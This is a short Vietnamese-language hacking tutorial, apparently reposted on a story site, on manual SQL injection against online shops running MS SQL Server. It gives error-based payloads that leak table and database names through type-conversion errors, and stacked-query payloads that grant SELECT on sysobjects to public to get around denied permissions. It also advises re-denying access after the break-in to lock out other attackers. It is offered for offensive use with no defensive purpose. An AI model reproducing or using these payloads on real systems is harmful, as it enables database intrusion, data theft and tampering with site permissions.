Anken - Hack SQL Injection bị deny SELECT - Y!m: This_Love_No1

Màu nền
Font chữ
Font size
Chiều cao dòng

Bình thường khi query shop lỗi SQL Injection

Quote:

convert(int,(select top 1 table_name from information_schema.tables))--

nó sẽ ra

Quote:

Syntax error converting the nvarchar value 'vhc_no1' to a column of data type int

nhưng nếu mọi người thấy.

Quote:

SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.

thường thường với những người dùng tools là không query được nên bỏ luôn

cái này là do đâu,là do

Quote:

thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j' .

ta sẽ dùng query sau

Quote:

;use dataname grant keyword on tables to public

trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vhc

query phát nào

Quote:

;use vhc grant select on sysobjects to public--

hack xong ta lại deny cái select cho bọn sau khác ko hack dc nữa.

-hack tay vẫn là ngon nhất

Bạn đang đọc truyện trên: Truyen2U.Pro